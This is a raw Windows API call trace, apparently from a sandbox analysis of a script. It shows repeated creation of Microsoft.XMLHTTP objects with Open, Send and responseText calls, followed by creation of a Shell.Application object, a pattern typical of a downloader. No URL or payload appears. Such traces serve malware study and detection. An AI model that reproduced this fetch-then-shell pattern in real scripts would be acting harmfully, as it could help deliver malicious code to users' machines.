	[0336.274] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0336.274] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0336.274] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0336.274] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0336.274] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c68) returned 0x0
	[0336.274] ??2@YAPEAX_K@Z () returned 0x62f330
	[0336.274] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c68, pUnkSite=0x62f330) 
	[0336.274] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0336.274] XMLHTTPRequest:IUnknown:Release (This=0x49c5c68) returned 0x0
	[0336.274] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0336.274] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0336.274] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0336.274] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0336.274] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0336.275] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0336.275] SysStringLen (param_1=0x0) returned 0x0
	[0336.275] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0336.275] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0336.275] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0336.275] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0336.275] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0336.275] ??2@YAPEAX_K@Z () returned 0x62f310
	[0336.275] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0336.275] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0336.275] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0336.275] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0336.275] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0336.275] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0336.275] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0336.275] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0336.276] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0336.276] SysStringLen (param_1=0x0) returned 0x0
	[0336.276] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0336.276] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0336.276] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0336.276] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0336.276] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0336.276] ??2@YAPEAX_K@Z () returned 0x62f330
	[0336.276] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0336.276] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0336.276] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0336.276] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0336.276] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0336.276] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0336.277] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0336.277] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0336.277] longjmp () 
	[0336.277] longjmp () 
	[0336.277] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0336.277] SysStringLen (param_1=0x0) returned 0x0
	[0336.277] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0336.277] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0336.277] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0336.277] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0336.277] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5ba8) returned 0x0
	[0336.277] ??2@YAPEAX_K@Z () returned 0x62f310
	[0336.277] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5ba8, pUnkSite=0x62f310) 
	[0336.277] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0336.277] XMLHTTPRequest:IUnknown:Release (This=0x49c5ba8) returned 0x0
	[0336.277] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0336.277] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0336.278] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0336.278] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0336.278] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0336.278] longjmp () 
	[0336.278] longjmp () 
	[0336.278] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0336.278] SysStringLen (param_1=0x0) returned 0x0
	[0336.278] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0336.278] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0336.278] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0336.278] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0336.278] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0336.278] ??2@YAPEAX_K@Z () returned 0x62f330
	[0336.278] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0336.278] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0336.278] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0336.278] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0336.279] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0336.279] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0336.279] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0336.279] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0336.279] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0336.279] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0336.279] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0337.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0337.137] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0337.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0337.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0337.137] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0337.138] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0337.138] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0337.138] SysStringLen (param_1=0x0) returned 0x0
	[0337.138] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0337.138] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0337.138] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0337.138] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0337.138] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0337.138] ??2@YAPEAX_K@Z () returned 0x62f350
	[0337.138] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0337.138] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0337.138] Shell:IUnknown:Release (This=0x396800) returned 0x1
